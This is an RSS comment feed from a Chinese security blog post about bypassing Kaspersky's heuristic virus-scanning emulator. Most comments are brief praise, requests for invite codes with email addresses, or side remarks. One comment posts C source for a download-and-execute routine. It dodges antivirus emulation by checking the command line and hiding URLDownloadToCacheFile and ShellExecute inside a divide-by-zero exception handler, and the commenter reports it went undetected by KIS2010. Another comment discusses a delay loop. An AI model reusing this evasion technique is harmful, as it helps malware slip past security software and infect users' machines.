<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>《[WebZine]卡巴虚拟机启发式查毒的绕过方法》的评论</title>
	<atom:link href="http://huaidan.org/archives/3440.html/feed" rel="self" type="application/rss+xml" />
	<link>http://huaidan.org/archives/3440.html</link>
	<description>关注网络安全</description>
	<lastBuildDate>Sat, 04 Feb 2012 06:18:55 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>作者：WFilter</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-16342</link>
		<dc:creator>WFilter</dc:creator>
		<pubDate>Mon, 30 Aug 2010 08:57:52 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-16342</guid>
		<description>牛啊。Nod32的启发式杀毒做的可能要更好些，等待博主再写一篇Nod32免杀的强帖！</description>
		<content:encoded><![CDATA[<p>牛啊。Nod32的启发式杀毒做的可能要更好些，等待博主再写一篇Nod32免杀的强帖！</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：smart</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-15435</link>
		<dc:creator>smart</dc:creator>
		<pubDate>Fri, 28 May 2010 05:23:04 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-15435</guid>
		<description>弱弱地问下，能要个tools的邀请吗？piaoye0605@163.com</description>
		<content:encoded><![CDATA[<p>弱弱地问下，能要个tools的邀请吗？piaoye0605@163.com</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：S.Orlando</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-15221</link>
		<dc:creator>S.Orlando</dc:creator>
		<pubDate>Wed, 07 Apr 2010 12:19:31 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-15221</guid>
		<description>其实有其他的方法~~</description>
		<content:encoded><![CDATA[<p>其实有其他的方法~~</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：ziguazichong</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-14711</link>
		<dc:creator>ziguazichong</dc:creator>
		<pubDate>Tue, 16 Feb 2010 14:00:30 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-14711</guid>
		<description>强悍!</description>
		<content:encoded><![CDATA[<p>强悍!</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：masepu</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-14540</link>
		<dc:creator>masepu</dc:creator>
		<pubDate>Sun, 17 Jan 2010 16:59:48 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-14540</guid>
		<description>最后for(int i = 0;i &lt; 1000000000; i++)
			__nop();
kis2010打开时程序一直无法成功执行,虽然没有报毒.但几乎程序没有响应.但关闭 KIS可成功执行</description>
		<content:encoded><![CDATA[<p>最后for(int i = 0;i &lt; 1000000000; i++)<br />
			__nop();<br />
kis2010打开时程序一直无法成功执行,虽然没有报毒.但几乎程序没有响应.但关闭 KIS可成功执行</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：masepu</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-14538</link>
		<dc:creator>masepu</dc:creator>
		<pubDate>Sun, 17 Jan 2010 15:17:48 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-14538</guid>
		<description>不好意思,看错了</description>
		<content:encoded><![CDATA[<p>不好意思,看错了</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：masepu</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-14536</link>
		<dc:creator>masepu</dc:creator>
		<pubDate>Sun, 17 Jan 2010 15:09:58 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-14536</guid>
		<description>滴滴答答</description>
		<content:encoded><![CDATA[<p>滴滴答答</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：masepu</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-14535</link>
		<dc:creator>masepu</dc:creator>
		<pubDate>Sun, 17 Jan 2010 15:06:33 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-14535</guid>
		<description>老大,似乎利用判断参数的方法可以过KIS2010呀,我试了没报警呀.你再看看,代码如下:
#include 
#include 
#pragma comment (lib,&quot;Urlmon.lib&quot;)

BOOL SafeDiv(INT32 dividend, INT32 divisor, INT32 *pResult)
{
    __try
    {
		*pResult = dividend / divisor;
    }
    __except(GetExceptionCode() == EXCEPTION_INT_DIVIDE_BY_ZERO ?
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
		TCHAR szFileName[MAX_PATH] = {0};
	URLDownloadToCacheFile(NULL,&quot;file://c:\\windows\\notepad.exe&quot;,szFileName,MAX_PATH,0,NULL);
	ShellExecute(0,&quot;open&quot;,szFileName,NULL,NULL,SW_SHOW);
		return TRUE;
    }
    return TRUE;
}

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
    INT32 Result;
	LPTSTR    lpCmdLine1 = NULL;
	INT32 divisor = 1;
	if(lpCmdLine[0] == &#039;&#039;)
	{
		TCHAR szPath[MAX_PATH];
		GetModuleFileName(NULL,szPath,MAX_PATH);
		Sleep(1000);
		ExitProcess(0);
		return;
	}
	else
	   divisor = 0;
	SafeDiv(10,divisor,&amp;Result);
ExitProcess(0);
	return ;
}</description>
		<content:encoded><![CDATA[<p>老大,似乎利用判断参数的方法可以过KIS2010呀,我试了没报警呀.你再看看,代码如下:<br />
#include<br />
#include<br />
#pragma comment (lib,"Urlmon.lib")</p>
<p>BOOL SafeDiv(INT32 dividend, INT32 divisor, INT32 *pResult)<br />
{<br />
    __try<br />
    {<br />
		*pResult = dividend / divisor;<br />
    }<br />
    __except(GetExceptionCode() == EXCEPTION_INT_DIVIDE_BY_ZERO ?<br />
             EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)<br />
    {<br />
		TCHAR szFileName[MAX_PATH] = {0};<br />
	URLDownloadToCacheFile(NULL,"file://c:\\windows\\notepad.exe",szFileName,MAX_PATH,0,NULL);<br />
	ShellExecute(0,"open",szFileName,NULL,NULL,SW_SHOW);<br />
		return TRUE;<br />
    }<br />
    return TRUE;<br />
}</p>
<p>int APIENTRY WinMain(HINSTANCE hInstance,<br />
                     HINSTANCE hPrevInstance,<br />
                     LPTSTR    lpCmdLine,<br />
                     int       nCmdShow)<br />
{<br />
    INT32 Result;<br />
	LPTSTR    lpCmdLine1 = NULL;<br />
	INT32 divisor = 1;<br />
	if(lpCmdLine[0] == '')<br />
	{<br />
		TCHAR szPath[MAX_PATH];<br />
		GetModuleFileName(NULL,szPath,MAX_PATH);<br />
		Sleep(1000);<br />
		ExitProcess(0);<br />
		return;<br />
	}<br />
	else<br />
	   divisor = 0;<br />
	SafeDiv(10,divisor,&amp;Result);<br />
ExitProcess(0);<br />
	return ;<br />
}</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：lsyg</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-14520</link>
		<dc:creator>lsyg</dc:creator>
		<pubDate>Fri, 15 Jan 2010 08:50:25 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-14520</guid>
		<description>俄罗斯国家科学院合作开发的，军方和克里姆林宫专用。。那个是大蜘蛛吧。。</description>
		<content:encoded><![CDATA[<p>俄罗斯国家科学院合作开发的，军方和克里姆林宫专用。。那个是大蜘蛛吧。。</p>
]]></content:encoded>
	</item>
	<item>
		<title>作者：dzj</title>
		<link>http://huaidan.org/archives/3440.html/comment-page-1#comment-14472</link>
		<dc:creator>dzj</dc:creator>
		<pubDate>Wed, 06 Jan 2010 01:10:15 +0000</pubDate>
		<guid isPermaLink="false">http://huaidan.org/archives/3440.html#comment-14472</guid>
		<description>如果可以，请也给我一个邀请码吧。。。cdcxdzj@163.com</description>
		<content:encoded><![CDATA[<p>如果可以，请也给我一个邀请码吧。。。cdcxdzj@163.com</p>
]]></content:encoded>
	</item>
</channel>
</rss>

